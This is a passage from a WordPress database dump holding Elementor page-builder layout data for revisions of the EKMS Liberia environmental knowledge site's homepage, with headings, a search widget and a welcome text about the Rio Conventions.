fb58b71\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f8f4095\",\"elType\":\"widget\",\"settings\":{\"title\":\"Knowledge Resources\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#54595f\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"62059d5\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"cc6fadf\",\"elType\":\"widget\",\"settings\":{\"min_height\":{\"unit\":\"px\",\"size\":450,\"sizes\":[]},\"show_terms\":\"\",\"show_terms_num\":\"2\",\"excerpt_length\":\"\",\"excerpt_trimmed_ending\":\"...\",\"show_date\":\"\",\"post_type\":\"related_theme\",\"custom_query_by\":\"ids\",\"post_ids\":\"468,470,473,474,487\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"5b2266b\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"76431bc\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"boxes_gap\":{\"unit\":\"px\",\"size\":4,\"sizes\":[]},\"boxes_title_color\":\"#ffffff\",\"boxes_title_color_hover\":\"#006400\",\"boxes_title_typography_typography\":\"custom\",\"boxes_title_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"boxes_title_typography_font_weight\":\"900\",\"boxes_title_alignment\":\"left\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-tiles\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e8d8c\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5c4a65b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b82855d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"9b26f8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(5727,504,'_elementor_version','2.7.5'),(5728,504,'_elementor_template_type','wp-page'),(5737,506,'_wp_page_template','default'),(5738,506,'_elementor_edit_mode','builder'),(5739,506,'_elementor_data','[{\"id\":\"lnk9sxt\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":900},\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":600},\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_forest_biodiversity.jpg\",\"id\":396},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#113b66\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.55},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"fabc2a1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"ghttmw8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3q0r5o4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Welcome to the EKMS\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":55},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"4\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":25}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f0wlz1l\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions - The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. Explore the Knowledge Resources by Related Topics and Institutions Resources.<\\/p>\",\"align\":\"center\",\"text_color\":\"#ffffff\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"400\",\"typography_font_family\":\"Arial\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f4a4a39\",\"elType\":\"widget\",\"settings\":{\"search_placeholder_text\":\"Search Knowledge Resources...\",\"search_submit_label\":\"Search\",\"show_search_category_list\":\"yes\",\"search_category_select_placeholder\":\"All Categories\",\"results_counter_text\":\"Results\",\"full_results_btn_text\":\"See all results\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c6a37ad\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c698fbe\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"negative_search\":\"Sorry, but nothing matched your search terms.\",\"server_error\":\"Sorry, but we cannot handle your search query now. Please, try again later!\",\"search_submit_bg_color\":\"rgba(0,100,0,0.86)\",\"search_category_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"jet-ajax-search\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b467af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4a9f59c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"fb58b71\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f8f4095\",\"elType\":\"widget\",\"settings\":{\"title\":\"Knowledge Resources\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#54595f\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"62059d5\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"cc6fadf\",\"elType\":\"widget\",\"settings\":{\"min_height\":{\"unit\":\"px\",\"size\":450,\"sizes\":[]},\"show_terms\":\"\",\"show_terms_num\":\"2\",\"excerpt_length\":\"\",\"excerpt_trimmed_ending\":\"...\",\"show_date\":\"\",\"post_type\":\"related_theme\",\"custom_query_by\":\"ids\",\"post_ids\":\"468,470,473,474,487\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"5b2266b\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"76431bc\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"boxes_gap\":{\"unit\":\"px\",\"size\":4,\"sizes\":[]},\"boxes_title_color\":\"#ffffff\",\"boxes_title_color_hover\":\"#006400\",\"boxes_title_typography_typography\":\"custom\",\"boxes_title_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"boxes_title_typography_font_weight\":\"900\",\"boxes_title_alignment\":\"left\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-tiles\"},{\"id\":\"724fd77\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Themes\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/related-themes\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e8d8c\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5c4a65b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b82855d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"9b26f8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c4de34e\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"08ca173\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"660b9f5\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"18eb3ee\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(5740,506,'_elementor_version','2.7.5'),(5741,506,'_elementor_template_type','wp-page'),(5743,507,'_wp_page_template','default'),(5744,507,'_elementor_edit_mode','builder'),(5745,507,'_elementor_data','[{\"id\":\"lnk9sxt\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":900},\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":600},\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_forest_biodiversity.jpg\",\"id\":396},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#113b66\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.55},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"fabc2a1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"ghttmw8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3q0r5o4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Welcome to the EKMS\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":55},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"4\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":25}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f0wlz1l\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions - The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. Explore the Knowledge Resources by Related Topics and Institutions Resources.<\\/p>\",\"align\":\"center\",\"text_color\":\"#ffffff\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"400\",\"typography_font_family\":\"Arial\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f4a4a39\",\"elType\":\"widget\",\"settings\":{\"search_placeholder_text\":\"Search Knowledge Resources...\",\"search_submit_label\":\"Search\",\"show_search_category_list\":\"yes\",\"search_category_select_placeholder\":\"All Categories\",\"results_counter_text\":\"Results\",\"full_results_btn_text\":\"See all results\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c6a37ad\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c698fbe\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"negative_search\":\"Sorry, but nothing matched your search terms.\",\"server_error\":\"Sorry, but we cannot handle your search query now. Please, try again later!\",\"search_submit_bg_color\":\"rgba(0,100,0,0.86)\",\"search_category_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"jet-ajax-search\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b467af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4a9f59c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"fb58b71\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f8f4095\",\"elType\":\"widget\",\"settings\":{\"title\":\"Knowledge Resources\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#54595f\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"62059d5\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"cc6fadf\",\"elType\":\"widget\",\"settings\":{\"min_height\":{\"unit\":\"px\",\"size\":450,\"sizes\":[]},\"show_terms\":\"\",\"show_terms_num\":\"2\",\"excerpt_length\":\"\",\"excerpt_trimmed_ending\":\"...\",\"show_date\":\"\",\"post_type\":\"related_theme\",\"custom_query_by\":\"ids\",\"post_ids\":\"468,470,473,474,487\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"5b2266b\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"76431bc\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"boxes_gap\":{\"unit\":\"px\",\"size\":4,\"sizes\":[]},\"boxes_title_color\":\"#ffffff\",\"boxes_title_color_hover\":\"#006400\",\"boxes_title_typography_typography\":\"custom\",\"boxes_title_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"boxes_title_typography_font_weight\":\"900\",\"boxes_title_alignment\":\"left\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-tiles\"},{\"id\":\"724fd77\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Themes\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/related-themes\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e8d8c\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5c4a65b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b82855d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"9b26f8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c4de34e\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"08ca173\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"660b9f5\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"18eb3ee\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(5746,507,'_elementor_version','2.7.5'),(5747,507,'_elementor_template_type','wp-page'),(5750,508,'_wp_page_template','default'),(5751,508,'_elementor_edit_mode','builder'),(5752,508,'_elementor_data','[{\"id\":\"lnk9sxt\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":900},\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":600},\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_forest_biodiversity.jpg\",\"id\":396},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#113b66\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.55},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"fabc2a1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\